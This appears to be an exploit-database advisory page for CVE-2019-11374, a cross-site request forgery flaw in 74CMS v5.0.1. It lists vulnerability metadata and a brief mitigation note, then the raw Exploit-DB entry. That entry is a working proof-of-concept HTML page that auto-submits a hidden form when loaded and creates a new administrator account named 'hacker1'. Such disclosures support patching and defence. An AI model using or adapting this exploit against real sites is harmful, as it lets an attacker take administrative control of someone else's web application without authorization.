header-logo
Suggest Exploit
vendor:
74CMS
by:
ax8
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: 74CMS
Affected Version From: v5.0.1
Affected Version To: v5.0.1
Patch Exists: NO
Related CWE: CVE-2019-11374
CPE: 74cms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

74CMS v5.0.1 has a CSRF vulnerability to add a new admin user

74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI. A proof of concept HTML file is provided which can be used to create a new administrator user.

Mitigation:

Implementing a CSRF token in the application can help prevent this type of attack.
Source

Exploit-DB raw data:

# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
# Date: 2019-04-14
# Exploit Author: ax8
# Vendor Homepage: https://github.com/Li-Siyuan
# Software Link: http://www.74cms.com/download/index.html
# Version: v5.0.1
# CVE : CVE-2019-11374

 

74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.

 

<!--poc.html(creat a administrater)-->

<!DOCTYPE html>

<html>

  <head>

  <title> CSRF Proof</title>

  <script type="text/javascript">

    function exec1(){

      document.getElementById('form1').submit();

    }

  </script>

  </head>

  <body onload="exec1();">

    <form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">

      <input type="hidden" name="username" value="hacker1" />

  <input type="hidden" name="email" value="111111111@qq.com" />

      <input type="hidden" name="password" value="hacker1" />

      <input type="hidden" name="repassword" value="hacker1" />  

  <input type="hidden" name="role_id" value="1" />

    </form>

  </body>

</html>